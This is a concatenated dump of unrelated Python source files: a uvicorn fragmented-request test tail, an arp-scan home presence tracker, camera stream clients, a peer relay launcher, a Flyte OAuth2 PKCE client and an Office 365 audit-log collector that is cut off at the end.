    time.sleep(1)  # wait for uvicorn to start
    path = "/?param=" + "q" * 10
    response = send_fragmented_req(path)
    bad_response = b"HTTP/1.1 400 Bad Request"
    # The fragmented request must NOT be rejected as malformed.
    assert bad_response != response[: len(bad_response)]
    server.should_exit = True
    t.join()
|
presence.py | import subprocess
from time import sleep, strftime, time
from threading import Thread
# Edit these for how many people/devices you want to track.
occupant = [""]
# MAC addresses for their phones; same index order as `occupant`.
address = [""]
# Per-occupant state arrays, indexed in step with `occupant`:
#   firstRun       - 1 until the first presence decision has been made
#   presentSent    - 1 once a "present" event has been recorded
#   notPresentSent - 1 once a "not present" event has been recorded
#   counter        - scan intervals elapsed since the device disappeared
firstRun = [1] * len(occupant)
presentSent = [0] * len(occupant)
notPresentSent = [0] * len(occupant)
counter = [0] * len(occupant)
def write_presence(occupant):
    """Append a timestamped presence snapshot line to presence.json."""
    timestamp = strftime("%Y-%m-%d %H:%M:%S")
    with open("presence.json", "a") as log:
        log.write("%s,%s\n" % (timestamp, str(occupant)))
def write_address(output):
    """Append a timestamped arp-scan output blob to mac.json."""
    timestamp = strftime("%Y-%m-%d %H:%M:%S")
    with open("mac.json", "a") as log:
        log.write("%s,%s\n" % (timestamp, str(output)))
# Function that checks for device presence
def whosHere(i):
    """Worker loop for one tracked device.

    Polls the globally shared arp-scan `output` and updates the shared
    per-device state arrays. `i` indexes into occupant/address.

    Fix: `print "Exiting Thread"` was a Python 2 print statement (a
    SyntaxError on Python 3) in a file that otherwise uses print();
    also replaced `if stop == True` with idiomatic `if stop`.
    """
    # Give the main thread time to populate the global `output` before the
    # first membership test (the main loop scans every 60 seconds).
    sleep(15)
    # Loop through checking for devices and counting if they're not present
    while True:
        # Exits thread if Keyboard Interrupt occurs
        if stop:
            print("Exiting Thread")
            exit()
        # If a listed device address is present print and stream
        if address[i] in output:
            print(occupant[i] + "'s device is connected to your network")
            if presentSent[i] == 0:
                firstRun[i] = 0
                presentSent[i] = 1
                notPresentSent[i] = 0
                counter[i] = 0
                sleep(60)
            else:
                # If a stream's already been sent, just wait
                # NOTE(review): comments said 30s but every sleep here is 60s.
                counter[i] = 0
                sleep(60)
        # If a listed device address is not present, print and stream
        else:
            print(occupant[i] + "'s device is not present")
            # Only consider a device offline once its counter reaches 30
            # missed intervals, or on the very first pass.
            if counter[i] == 30 or firstRun[i] == 1:
                firstRun[i] = 0
                if notPresentSent[i] == 0:
                    notPresentSent[i] = 1
                    presentSent[i] = 0
                    counter[i] = 0
                else:
                    # If a stream's already been sent, just reset and wait
                    counter[i] = 0
                sleep(60)
            # Count how many intervals have happened since the device
            # disappeared from the network
            else:
                counter[i] = counter[i] + 1
                print(occupant[i] + "'s counter at " + str(counter[i]))
                sleep(60)
# Main thread: scans the network every 60s and shares the result with the
# whosHere() worker threads via the module-global `output`.
try:
    # Flag the whosHere threads poll to know when to exit.
    # NOTE(review): `global` at module level is a no-op; kept byte-identical.
    global stop
    stop = False
    # Start one monitoring thread per tracked occupant/device.
    for i in range(len(occupant)):
        t = Thread(target=whosHere, args=(i,))
        t.start()
    while True:
        # Make output global so the threads can see it
        global output
        # Assign list of devices on the network to "output"
        # NOTE(review): shells out to `sudo arp-scan -l`; requires root and
        # arp-scan to be installed.
        output = subprocess.check_output("sudo arp-scan -l", shell=True)
        write_presence(occupant)
        write_address(output)
        # Wait 60 seconds between scans
        sleep(60)
except KeyboardInterrupt:
    # On a keyboard interrupt signal threads to exit
    stop = True
    exit()
|
t0.py | import threading
from time import sleep
import sys
x=int()  # latest line read from stdin; shared between the two threads
p=int()  # placeholder accumulator; never updated in this script
def c():
    """Continuously read lines from stdin into the shared global `x`."""
    global x, p
    while True:
        x = input()
def printer():
    """Print the shared global `x` once per second, forever."""
    global x, p
    while True:
        print(x)
        sleep(1)
# Reader runs in the background; daemon=True so it dies with the main thread.
t1=threading.Thread(target=c)
t1.daemon=True
t1.start()
# The printer blocks the main thread forever.
printer()
|
ffmpegstream.py | """ OpenCV Backend RTSP Client """
import cv2
from io import BytesIO
from PIL import Image
from threading import Thread
class Client:
    """ Maintain live RTSP feed without buffering.

    A daemon thread keeps reading frames from the cv2.VideoCapture and keeps
    only the most recent one in self._queue, so read() returns the live frame
    rather than a backlog.
    """
    # Class-level default: no capture handle until __init__ runs.
    _stream = None
    def __init__(self, rtsp_server_uri, verbose = False):
        """
        rtsp_server_uri: the path to an RTSP server. should start with "rtsp://"
        verbose: print log or not
        """
        self.rtsp_server_uri = rtsp_server_uri
        self._verbose = verbose
        # Background-thread run flag; open() (called below) flips it to True.
        self._bg = False
        self._stream = cv2.VideoCapture(self.rtsp_server_uri)
        if self._verbose:
            print("Connected to video source {}.".format(self.rtsp_server_uri))
        self.open()
    def __enter__(self,*args,**kwargs):
        """ Returns the object which later will have __exit__ called.
            This relationship creates a context manager. """
        return self
    def __exit__(self, type=None, value=None, traceback=None):
        """ Together with __enter__, allows support for `with-` clauses. """
        self.close()
    def open(self):
        """Start the background frame-reader thread (no-op if already open).

        NOTE(review): returns None when already open, self otherwise.
        """
        if self.isOpened():
            return
        self._bg = True
        # Daemon thread: dies with the interpreter instead of blocking exit.
        t = Thread(target=self._update, args=())
        t.daemon = True
        t.start()
        return self
    def close(self):
        """ signal background thread to stop. release CV stream """
        self._bg = False
        self._stream.release()
        if self._verbose:
            print("Disconnected from {}".format(self.rtsp_server_uri))
    def isOpened(self):
        """ return true if stream is opened and being read, else ensure closed """
        try:
            return (self._stream is not None) and self._stream.isOpened() and self._bg
        except:
            # Any failure probing the stream: force-close and report closed.
            self.close()
            return False
    def _update(self):
        # Reader loop: keep only the latest frame; a failed grab stops it.
        while self.isOpened():
            (grabbed, frame) = self._stream.read()
            if not grabbed:
                self._bg = False
            else:
                # NOTE(review): despite the name, _queue holds a single frame,
                # and is undefined until the first successful grab -- read()
                # relies on its bare except to cover that window.
                self._queue = frame
    def read(self,raw=False):
        """ Retrieve most recent frame and convert to PIL. Return unconverted with raw=True. """
        try:
            if raw:
                return self._queue
            else:
                return Image.fromarray(cv2.cvtColor(self._queue, cv2.COLOR_BGR2RGB))
        except:
            # No frame captured yet (or conversion failed): report None.
            return None
    def preview(self):
        """ Blocking function. Opens OpenCV window to display stream. """
        win_name = 'RTSP'
        cv2.namedWindow(win_name, cv2.WINDOW_AUTOSIZE)
        cv2.moveWindow(win_name,20,20)
        # 'q' quits the preview loop.
        while(self.isOpened()):
            cv2.imshow(win_name,self.read(raw=True))
            if cv2.waitKey(25) & 0xFF == ord('q'):
                break
        cv2.waitKey()
        cv2.destroyAllWindows()
        cv2.waitKey()
class PicamVideoFeed:
    """Video feed backed by the Raspberry Pi camera module (picamera)."""

    def __init__(self):
        # Imported lazily so this module still loads on machines without picamera.
        import picamera
        self.cam = picamera.PiCamera()

    def preview(self, *args, **kwargs):
        """Blocking preview using the camera's built-in preview overlay."""
        self.cam.start_preview(*args, **kwargs)

    def open(self):
        """No-op: the Pi camera is opened in __init__."""
        pass

    def isOpened(self):
        """The Pi camera is always considered open once constructed."""
        return True

    def read(self):
        """https://picamera.readthedocs.io/en/release-1.13/recipes1.html#capturing-to-a-pil-image"""
        buf = BytesIO()
        self.cam.capture(buf, format='png')
        # "Rewind" the buffer so PIL can read the PNG bytes from the start.
        buf.seek(0)
        return Image.open(buf)

    def close(self):
        """No-op: provided for interface parity with the other feed classes."""
        pass

    def stop(self):
        """No-op: provided for interface parity with the other feed classes."""
        pass
class WebcamVideoFeed:
    """Video feed backed by a local camera interface via OpenCV."""

    def __init__(self, source_id, verbose = False):
        """
        source_id: the id of a camera interface. Should be an integer
        verbose: print log or not
        """
        self._cam_id = source_id
        self._verbose = verbose
        self.open()

    def __enter__(self, *args, **kwargs):
        """Context-manager entry: yields this object for use in `with` blocks."""
        return self

    def __exit__(self, type=None, value=None, traceback=None):
        """Context-manager exit: releases the capture device."""
        self.close()

    def open(self):
        """Connect to the camera, unless a connection is already open."""
        if self.isOpened():
            return
        self._stream = cv2.VideoCapture(self._cam_id)
        if self._verbose:
            if self.isOpened():
                print("Connected to video source {}.".format(self._cam_id))
            else:
                print("Failed to connect to source {}.".format(self._cam_id))
        return

    def close(self):
        """Release the underlying OpenCV capture if it is open."""
        if self.isOpened():
            self._stream.release()

    def isOpened(self):
        """True when a capture exists and reports itself open; False otherwise."""
        try:
            # Before open() assigns it, self._stream does not exist; the
            # AttributeError is caught below and treated as "closed".
            return self._stream is not None and self._stream.isOpened()
        except:
            return False

    def read(self):
        """Grab one frame and return it as an RGB PIL image."""
        ok, frame = self._stream.read()
        return Image.fromarray(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))

    def preview(self):
        """ Blocking function. Opens OpenCV window to display stream. """
        win_name = 'Camera'
        cv2.namedWindow(win_name, cv2.WINDOW_AUTOSIZE)
        cv2.moveWindow(win_name, 20, 20)
        self.open()
        while self.isOpened():
            cv2.imshow(win_name, self._stream.read()[1])
            if cv2.waitKey(25) & 0xFF == ord('q'):
                break
        cv2.waitKey()
        cv2.destroyAllWindows()
        cv2.waitKey()
|
run_severus.py | import severus
import _thread as thread
import socket
import requests
import random
import threading
import time
def is_relay():
    """Return True when this host can accept inbound connections from the
    internet (i.e. it can act as a relay node).

    Strategy: listen on a random high port, learn our external IP, then try to
    connect back to ourselves from the outside-facing address.
    """
    def listen(port):
        # Accept exactly one connection on the probe port, then close it.
        srv = socket.socket()
        srv.bind(("0.0.0.0", port))
        srv.listen(5)
        conn, _addr = srv.accept()
        conn.close()

    port = random.randint(5000, 9999)
    try:
        ip = requests.get("https://bot.whatismyipaddress.com").content.decode()
    except:
        ip = input("Could not get external IP address... what is it? ")
    # Never probe on the port severus itself is using.
    while port == severus.config.port:
        port = random.randint(5000, 9999)
    # NOTE(review): not a daemon thread — if the connect-back below fails, this
    # thread stays blocked in accept() for the life of the process.
    listener = threading.Thread(target=listen, args=(port,))
    listener.start()
    time.sleep(3)  # Give thread time to start socket
    probe = socket.socket()
    try:
        probe.settimeout(5)
        probe.connect((ip, port))
    except:
        probe.close()
        return False
    probe.close()
    return True
# Relay nodes accept inbound connections and serve other peers; leech nodes
# only sync outbound. Both retry sync every 30 seconds on failure.
if is_relay():
    severus.config.is_relay = True
    print("Relay Node")
    # Serve peers in a background thread while this thread performs the sync.
    thread.start_new_thread(severus.listen, ())
    synced = False
    while not synced:
        try:
            severus.sync()
            synced = True
        except Exception as e:
            print(e)
            time.sleep(30)
    # NOTE(review): busy-wait keeps the process (and listener thread) alive but
    # pegs a CPU core; a sleep loop would be cheaper — confirm intent.
    while True:
        pass
else:
    print("Leech node")
    severus.config.is_relay = False
    # Leech nodes re-sync forever; sync() is assumed safe to call repeatedly.
    while True:
        try:
            severus.sync()
        except Exception as e:
            print(e)
            time.sleep(30)
|
auth.py | import base64 as _base64
import hashlib as _hashlib
import os as _os
import re as _re
import webbrowser as _webbrowser
from multiprocessing import Process as _Process
from multiprocessing import Queue as _Queue
import keyring as _keyring
import requests as _requests
try: # Python 3.5+
from http import HTTPStatus as _StatusCodes
except ImportError:
try: # Python 3
from http import client as _StatusCodes
except ImportError: # Python 2
import httplib as _StatusCodes
try: # Python 3
import http.server as _BaseHTTPServer
except ImportError: # Python 2
import BaseHTTPServer as _BaseHTTPServer
try: # Python 3
import urllib.parse as _urlparse
from urllib.parse import urlencode as _urlencode
except ImportError: # Python 2
from urllib import urlencode as _urlencode
import urlparse as _urlparse
# Number of random bytes fed into the PKCE code-verifier (see RFC 7636 §4.1).
_code_verifier_length = 64
# Number of random bytes fed into the OAuth2 'state' parameter.
_random_seed_length = 40
_utf_8 = "utf-8"
# Identifies the service used for storing passwords in keyring
_keyring_service_name = "flyteauth"
# Identifies the key used for storing and fetching from keyring. In our case, instead of a username as the keyring docs
# suggest, we are storing a user's oidc.
_keyring_access_token_storage_key = "access_token"
_keyring_refresh_token_storage_key = "refresh_token"
def _generate_code_verifier():
    """
    Generates a 'code_verifier' as described in https://tools.ietf.org/html/rfc7636#section-4.1
    Adapted from https://github.com/openstack/deb-python-oauth2client/blob/master/oauth2client/_pkce.py.
    :return str: a random URL-safe verifier of 43-128 allowed characters
    """
    raw = _base64.urlsafe_b64encode(_os.urandom(_code_verifier_length)).decode(_utf_8)
    # Strip any characters outside the RFC 7636 'unreserved' set.
    verifier = _re.sub(r"[^a-zA-Z0-9_\-.~]+", "", raw)
    if len(verifier) < 43:
        raise ValueError("Verifier too short. number of bytes must be > 30.")
    if len(verifier) > 128:
        raise ValueError("Verifier too long. number of bytes must be < 97.")
    return verifier
def _generate_state_parameter():
    """Return a random URL-safe 'state' value for the OAuth2 authorization request."""
    seed = _base64.urlsafe_b64encode(_os.urandom(_random_seed_length)).decode(_utf_8)
    # Strip characters outside the allowed set.
    return _re.sub("[^a-zA-Z0-9-_.,]+", "", seed)
def _create_code_challenge(code_verifier):
"""
Adapted from https://github.com/openstack/deb-python-oauth2client/blob/master/oauth2client/_pkce.py.
:param str code_verifier: represents a code verifier generated by generate_code_verifier()
:return str: urlsafe base64-encoded sha256 hash digest
"""
code_challenge = _hashlib.sha256(code_verifier.encode(_utf_8)).digest()
code_challenge = _base64.urlsafe_b64encode(code_challenge).decode(_utf_8)
# Eliminate invalid characters
code_challenge = code_challenge.replace("=", "")
return code_challenge
class AuthorizationCode(object):
    """Immutable pair of the OAuth2 authorization code and the echoed state value."""

    def __init__(self, code, state):
        self._code = code
        self._state = state

    @property
    def code(self):
        """The authorization code returned by the auth server."""
        return self._code

    @property
    def state(self):
        """The opaque state value echoed back by the auth server."""
        return self._state
class OAuthCallbackHandler(_BaseHTTPServer.BaseHTTPRequestHandler):
    """
    A simple wrapper around BaseHTTPServer.BaseHTTPRequestHandler that handles a callback URL that accepts an
    authorization token.
    """

    def do_GET(self):
        parsed = _urlparse.urlparse(self.path)
        # Anything other than the configured redirect path is a 404.
        if parsed.path != self.server.redirect_path:
            self.send_response(_StatusCodes.NOT_FOUND)
            return
        self.send_response(_StatusCodes.OK)
        self.end_headers()
        self.handle_login(dict(_urlparse.parse_qsl(parsed.query)))

    def handle_login(self, data):
        """Forward the received code/state pair to the owning server."""
        self.server.handle_authorization_code(AuthorizationCode(data["code"], data["state"]))
class OAuthHTTPServer(_BaseHTTPServer.HTTPServer):
    """
    A simple wrapper around the BaseHTTPServer.HTTPServer implementation that binds an authorization_client for handling
    authorization code callbacks.
    """

    def __init__(self, server_address, RequestHandlerClass, bind_and_activate=True,
                 redirect_path=None, queue=None):
        _BaseHTTPServer.HTTPServer.__init__(self, server_address, RequestHandlerClass, bind_and_activate)
        # Path that the OAuth redirect URI points at, matched by the handler.
        self._redirect_path = redirect_path
        self._auth_code = None
        # Queue used to hand the received authorization code back to the caller.
        self._queue = queue

    @property
    def redirect_path(self):
        """The URL path on which authorization-code callbacks are accepted."""
        return self._redirect_path

    def handle_authorization_code(self, auth_code):
        """Publish a received authorization code to the waiting consumer."""
        self._queue.put(auth_code)
class Credentials(object):
    """Read-only holder for an OAuth2 access token."""

    def __init__(self, access_token=None):
        self._access_token = access_token

    @property
    def access_token(self):
        """The raw bearer token string, or None when unauthenticated."""
        return self._access_token
class AuthorizationClient(object):
    """
    Drives the OAuth2 authorization-code flow with PKCE.

    On construction this client first tries to reuse tokens already stored in
    the OS keyring. Failing that, it starts a local callback HTTP server in a
    child process, opens the system browser at the authorization endpoint,
    waits for the authorization code, and exchanges it for tokens.

    :param auth_endpoint: URL of the authorization endpoint (browser is sent here)
    :param token_endpoint: URL of the token endpoint (code/refresh exchanges)
    :param client_id: OAuth application client id
    :param redirect_uri: local callback URI registered with the OAuth app
    """

    def __init__(self, auth_endpoint=None, token_endpoint=None, client_id=None, redirect_uri=None):
        self._auth_endpoint = auth_endpoint
        self._token_endpoint = token_endpoint
        self._client_id = client_id
        self._redirect_uri = redirect_uri
        self._code_verifier = _generate_code_verifier()
        code_challenge = _create_code_challenge(self._code_verifier)
        self._code_challenge = code_challenge
        state = _generate_state_parameter()
        self._state = state
        self._credentials = None
        self._refresh_token = None
        self._headers = {"content-type": "application/x-www-form-urlencoded"}
        self._expired = False
        self._params = {
            "client_id": client_id,  # This must match the Client ID of the OAuth application.
            "response_type": "code",  # Indicates the authorization code grant
            "scope": "openid offline_access",  # ensures that the /token endpoint returns an ID and refresh token
            # callback location where the user-agent will be directed to.
            "redirect_uri": self._redirect_uri,
            "state": state,
            "code_challenge": code_challenge,
            "code_challenge_method": "S256",
        }
        # Prefer to use already-fetched token values when they've been set globally.
        self._refresh_token = _keyring.get_password(_keyring_service_name, _keyring_refresh_token_storage_key)
        access_token = _keyring.get_password(_keyring_service_name, _keyring_access_token_storage_key)
        if access_token:
            self._credentials = Credentials(access_token=access_token)
            return
        # In the absence of globally-set token values, initiate the token request flow.
        q = _Queue()
        # The callback server runs in a child process so the browser redirect can
        # be served while this process blocks on the queue below.
        server = self._create_callback_server(q)
        server_process = _Process(target=server.handle_request)
        server_process.start()
        # Send the call to request the authorization code.
        self._request_authorization_code()
        # Block until the authorization code arrives, then exchange it for tokens.
        auth_code = q.get()
        server_process.terminate()
        self.request_access_token(auth_code)

    def _create_callback_server(self, q):
        """Build the local HTTP server that will receive the OAuth redirect."""
        server_url = _urlparse.urlparse(self._redirect_uri)
        server_address = (server_url.hostname, server_url.port)
        return OAuthHTTPServer(server_address, OAuthCallbackHandler, redirect_path=server_url.path, queue=q)

    def _request_authorization_code(self):
        """Open the user's browser at the authorization endpoint with the PKCE params."""
        scheme, netloc, path, _, _, _ = _urlparse.urlparse(self._auth_endpoint)
        query = _urlencode(self._params)
        endpoint = _urlparse.urlunparse((scheme, netloc, path, None, query, None))
        _webbrowser.open_new_tab(endpoint)

    def _initialize_credentials(self, auth_token_resp):
        """
        Store tokens from a successful token-endpoint response.

        The auth_token_resp body is of the form:
        {
            "access_token": "foo",
            "refresh_token": "bar",
            "id_token": "baz",
            "token_type": "Bearer"
        }

        :raises ValueError: if the response contains no "access_token"
        """
        response_body = auth_token_resp.json()
        if "access_token" not in response_body:
            raise ValueError('Expected "access_token" in response from oauth server')
        access_token = response_body["access_token"]
        _keyring.set_password(_keyring_service_name, _keyring_access_token_storage_key, access_token)
        # BUG FIX: the refresh token is optional in the response. Previously it
        # was read unconditionally, raising KeyError whenever absent.
        if "refresh_token" in response_body:
            self._refresh_token = response_body["refresh_token"]
            _keyring.set_password(_keyring_service_name, _keyring_refresh_token_storage_key, self._refresh_token)
        self._credentials = Credentials(access_token=access_token)

    def request_access_token(self, auth_code):
        """
        Exchange an authorization code for tokens at the token endpoint.

        :param auth_code: AuthorizationCode received from the callback server
        :raises ValueError: if the echoed state does not match the one we sent
        :raises Exception: if the token endpoint returns a non-OK status
        """
        if self._state != auth_code.state:
            raise ValueError("Unexpected state parameter [{}] passed".format(auth_code.state))
        self._params.update(
            {"code": auth_code.code, "code_verifier": self._code_verifier, "grant_type": "authorization_code"}
        )
        resp = _requests.post(
            url=self._token_endpoint,
            data=self._params,
            headers=self._headers,
            allow_redirects=False,
        )
        if resp.status_code != _StatusCodes.OK:
            # TODO: handle expected (?) error cases:
            #  https://auth0.com/docs/flows/guides/device-auth/call-api-device-auth#token-responses
            raise Exception(
                "Failed to request access token with response: [{}] {}".format(resp.status_code, resp.content)
            )
        self._initialize_credentials(resp)

    def refresh_access_token(self):
        """
        Use the stored refresh token to obtain a fresh access token.

        On failure the keyring entries are cleared and `expired` is set, which
        signals the caller that this client must be re-initialized.

        :raises ValueError: if no refresh token is available
        """
        if self._refresh_token is None:
            raise ValueError("no refresh token available with which to refresh authorization credentials")
        resp = _requests.post(
            url=self._token_endpoint,
            data={"grant_type": "refresh_token", "client_id": self._client_id, "refresh_token": self._refresh_token},
            headers=self._headers,
            allow_redirects=False,
        )
        if resp.status_code != _StatusCodes.OK:
            self._expired = True
            # In the absence of a successful response, assume the refresh token is expired. This should indicate
            # to the caller that the AuthorizationClient is defunct and a new one needs to be re-initialized.
            _keyring.delete_password(_keyring_service_name, _keyring_access_token_storage_key)
            _keyring.delete_password(_keyring_service_name, _keyring_refresh_token_storage_key)
            return
        self._initialize_credentials(resp)

    @property
    def credentials(self):
        """
        :return flytekit.clis.auth.auth.Credentials:
        """
        return self._credentials

    @property
    def expired(self):
        """
        :return bool: True once a refresh attempt has failed
        """
        return self._expired
|
AuditLogCollector.py | #!/usr/bin/python3
# Standard libs
import os
import json
import logging
import datetime
import argparse
import dateutil.parser
from collections import deque
import threading
# Internal libs
import GraylogInterface
import ApiConnection
class AuditLogCollector(ApiConnection.ApiConnection):
    """
    Retrieves Office 365 audit-log content blobs for a list of content types
    and outputs them to files and/or a Graylog input (socket).
    """

    def __init__(self, output_path, content_types, *args, graylog_address=None, graylog_port=None, graylog_output=False,
                 file_output=False, **kwargs):
        """
        Object that can retrieve all available content blobs for a list of content types and then retrieve those
        blobs and output them to a file or Graylog input (i.e. send over a socket).
        :param output_path: path to output retrieved logs to (None=no file output) (string)
        :param content_types: list of content types to retrieve (e.g. 'Audit.Exchange', 'Audit.Sharepoint')
        :param graylog_address: IP/Hostname of Graylog server to output audit logs to (str)
        :param graylog_port: port of Graylog server to output audit logs to (int)
        :param graylog_output: send retrieved logs to Graylog (bool)
        :param file_output: write retrieved logs to files under output_path (bool)
        """
        super().__init__(*args, **kwargs)
        self.file_output = file_output
        self.graylog_output = graylog_output
        self.output_path = output_path
        self.content_types = content_types
        # Lazy cache for the 'known_content' file: {content_id: expiration}.
        self._known_content = {}
        self._graylog_interface = GraylogInterface.GraylogInterface(graylog_address=graylog_address,
                                                                    graylog_port=graylog_port)
        # Work queue of blob descriptors waiting to be downloaded.
        self.blobs_to_collect = deque()
        self.monitor_thread = threading.Thread()
        self.retrieve_available_content_threads = deque()
        self.retrieve_content_threads = deque()

    def run_once(self):
        """
        Check available content and retrieve it, then exit.
        """
        self._clean_known_content()
        self.start_monitoring()
        self.get_all_available_content()
        self.monitor_thread.join()

    @property
    def done_retrieving_content(self):
        # True once no blob descriptors remain queued for download.
        return not bool(self.blobs_to_collect)

    @property
    def done_collecting_available_content(self):
        """
        Once a call is made to retrieve content for a particular type, and there is no 'NextPageUri' in the response,
        the type is removed from 'self.content_types' to signal that all available content has been retrieved for that
        type.
        """
        return not bool(self.content_types)

    def start_monitoring(self):
        """Start the blob-download monitor in a background daemon thread."""
        self.monitor_thread = threading.Thread(target=self.monitor_blobs_to_collect, daemon=True)
        self.monitor_thread.start()

    def stop_monitoring(self):
        """Block until the monitor thread has finished."""
        self.monitor_thread.join()

    def get_all_available_content(self):
        """
        Make a call to retrieve available content blobs for each content type, each in its own thread.
        """
        # Iterate a copy: get_available_content() removes finished types from self.content_types.
        for content_type in self.content_types.copy():
            self.retrieve_available_content_threads.append(threading.Thread(
                target=self.get_available_content, daemon=True, kwargs={'content_type': content_type}))
            self.retrieve_available_content_threads[-1].start()

    def get_available_content(self, content_type):
        """
        Retrieve all available content blob descriptors for one content type, following
        'NextPageUri' pagination until exhausted.
        """
        logging.log(level=logging.DEBUG, msg='Getting available content for type: "{0}"'.format(content_type))
        current_time = datetime.datetime.now(datetime.timezone.utc)
        end_time = str(current_time).replace(' ', 'T').rsplit('.', maxsplit=1)[0]
        start_time = str(current_time - datetime.timedelta(hours=1)).replace(' ', 'T').rsplit('.', maxsplit=1)[0]
        response = self.make_api_request(url='subscriptions/content?contentType={0}&startTime={1}&endTime={2}'.format(
            content_type, start_time, end_time))
        self.blobs_to_collect += response.json()
        # BUG FIX: fetch the next page first, THEN append its blobs. The previous
        # order appended the current page a second time on every iteration and
        # never appended the final page at all.
        while 'NextPageUri' in response.headers.keys() and response.headers['NextPageUri']:
            logging.log(level=logging.DEBUG, msg='Getting next page of content for type: "{0}"'.format(content_type))
            response = self.make_api_request(url=response.headers['NextPageUri'], append_url=False)
            self.blobs_to_collect += response.json()
        self.content_types.remove(content_type)
        logging.log(level=logging.DEBUG, msg='Got {0} content blobs of type: "{1}"'.format(
            len(self.blobs_to_collect), content_type))

    def monitor_blobs_to_collect(self):
        """
        Wait for the 'retrieve_available_content' function to retrieve content URI's. Once they become available
        start retrieving in a background thread.
        """
        self._graylog_interface.start()
        threads = deque()
        while not (self.done_collecting_available_content and self.done_retrieving_content):
            # NOTE(review): busy-wait; a short sleep here would reduce CPU usage.
            if not self.blobs_to_collect:
                continue
            blob_json = self.blobs_to_collect.popleft()
            if blob_json and 'contentUri' in blob_json:
                logging.log(level=logging.DEBUG, msg='Retrieving content blob: "{0}"'.format(blob_json))
                threads.append(threading.Thread(
                    target=self.retrieve_content, daemon=True,
                    kwargs={'content_json': blob_json, 'save_as_file': self.file_output,
                            'send_to_graylog': self.graylog_output}))
                threads[-1].start()
        self._graylog_interface.stop()

    def retrieve_content(self, content_json, send_to_graylog=False, save_as_file=False):
        """
        Get an available content blob. If it exists in the list of known content blobs it is skipped to ensure
        idempotence.
        :param content_json: JSON dict of the content blob as retrieved from the API (dict)
        :param send_to_graylog: send the messages to a Graylog input after receiving (Bool)
        :param save_as_file: save the messages to a file after receiving (Bool)
        :return:
        """
        if self.known_content and content_json['contentId'] in self.known_content:
            return
        try:
            result = self.make_api_request(url=content_json['contentUri'], append_url=False).json()
            if not result:
                return
        except Exception:
            # Best effort: a blob that cannot be fetched is skipped, not fatal.
            return
        else:
            self._add_known_content(content_id=content_json['contentId'],
                                    content_expiration=content_json['contentExpiration'])
            if save_as_file:
                self.output_results_to_file(results=result, content_id=content_json['contentId'])
            if send_to_graylog:
                self._graylog_interface.send_messages_to_graylog(*result)

    def output_results_to_file(self, results, content_id):
        """
        Dump received JSON messages to a file named after the content id.
        :param results: retrieved JSON (dict)
        :param content_id: ID of the content blob to avoid duplicates (string)
        """
        if not os.path.exists(self.output_path):
            os.mkdir(self.output_path)
        with open(os.path.join(self.output_path, str(content_id)), 'w') as ofile:
            json.dump(obj=results, fp=ofile)

    def _add_known_content(self, content_id, content_expiration):
        """
        Add a content ID to the known content file to avoid saving messages more than once.
        :param content_id: string
        :param content_expiration: date string
        """
        with open('known_content', 'a') as ofile:
            ofile.write('\n{0},{1}'.format(content_id, content_expiration))

    def _clean_known_content(self):
        """
        Rewrite the known-content file keeping only IDs that have not yet expired. Can't download a
        duplicate if it is no longer available for download.
        """
        if os.path.exists('known_content'):
            known_contents = self.known_content
            os.remove('known_content')
            for content_id, expire_date in known_contents.items():
                expires_on = dateutil.parser.parse(expire_date)
                if datetime.datetime.now(datetime.timezone.utc) < expires_on:
                    self._add_known_content(content_id=content_id, content_expiration=expire_date)

    @property
    def known_content(self):
        """
        Parse and return known content file.
        :return: {content_id: content_expiration_date} dict, or None if the file does not exist
        """
        if not os.path.exists('known_content'):
            return
        if not self._known_content:
            with open('known_content', 'r') as ofile:
                for line in ofile.readlines():
                    try:
                        self._known_content[line.split(',')[0].strip()] = line.split(',')[1]
                    except Exception:
                        # Skip malformed lines (e.g. the leading blank line).
                        continue
        return self._known_content
if __name__ == "__main__":
    description = \
    """
    Retrieve audit log contents from Office 365 API and save to file or Graylog.
    Example: Retrieve all available content and send it to Graylog (using mock ID's and keys):
    "AuditLogCollector.py 123 456 789 --general --exchange --azure_ad --sharepoint --dlp -g -gA 10.10.10.1 -gP 5000
    """
    parser = argparse.ArgumentParser(description=description)
    parser.add_argument('tenant_id', type=str, help='Tenant ID of Azure AD', action='store')
    parser.add_argument('client_key', type=str, help='Client key of Azure application', action='store')
    parser.add_argument('secret_key', type=str, help='Secret key generated by Azure application', action='store')
    parser.add_argument('--general', action='store_true', help='Retrieve General content', dest='general')
    parser.add_argument('--exchange', action='store_true', help='Retrieve Exchange content', dest='exchange')
    parser.add_argument('--azure_ad', action='store_true', help='Retrieve Azure AD content', dest='azure_ad')
    parser.add_argument('--sharepoint', action='store_true', help='Retrieve SharePoint content', dest='sharepoint')
    parser.add_argument('--dlp', action='store_true', help='Retrieve DLP content', dest='dlp')
    # BUG FIX: default previously pointed at the log-file path (copy-paste from -l);
    # a publisher GUID default must be absent, not a file path.
    parser.add_argument('-p', metavar='publisher_id', type=str, help='Publisher GUID to avoid API throttling',
                        action='store', dest='publisher_id', default=None)
    parser.add_argument('-l', metavar='log_path', type=str, help='Path of log file', action='store', dest='log_path',
                        default=os.path.join(os.path.dirname(__file__), 'AuditLogCollector.log'))
    parser.add_argument('-f', help='Output to file.', action='store_true', dest='file')
    parser.add_argument('-fP', metavar='file_output_path', type=str, help='Path of directory of output files',
                        default=os.path.join(os.path.dirname(__file__), 'output'), action='store',
                        dest='output_path')
    parser.add_argument('-g', help='Output to graylog.', action='store_true', dest='graylog')
    parser.add_argument('-gA', metavar='graylog_address', type=str, help='Address of graylog server.', action='store',
                        dest='graylog_addr')
    parser.add_argument('-gP', metavar='graylog_port', type=str, help='Port of graylog server.', action='store',
                        dest='graylog_port')
    parser.add_argument('-d', action='store_true', dest='debug_logging',
                        help='Enable debug logging (generates large log files and decreases performance).')
    args = parser.parse_args()
    argsdict = vars(args)
    # Map the individual flags onto the API's content-type identifiers.
    content_types = []
    if argsdict['general']:
        content_types.append('Audit.General')
    if argsdict['exchange']:
        content_types.append('Audit.Exchange')
    if argsdict['sharepoint']:
        content_types.append('Audit.Sharepoint')
    if argsdict['azure_ad']:
        content_types.append('Audit.AzureActiveDirectory')
    if argsdict['dlp']:
        content_types.append('DLP.All')
    logging.basicConfig(filemode='w', filename=argsdict['log_path'],
                        level=logging.INFO if not argsdict['debug_logging'] else logging.DEBUG)
    logging.log(level=logging.INFO, msg='Starting run @ {0}'.format(datetime.datetime.now()))
    collector = AuditLogCollector(output_path=argsdict['output_path'], tenant_id=argsdict['tenant_id'],
                                  secret_key=argsdict['secret_key'], client_key=argsdict['client_key'],
                                  content_types=content_types, graylog_address=argsdict['graylog_addr'],
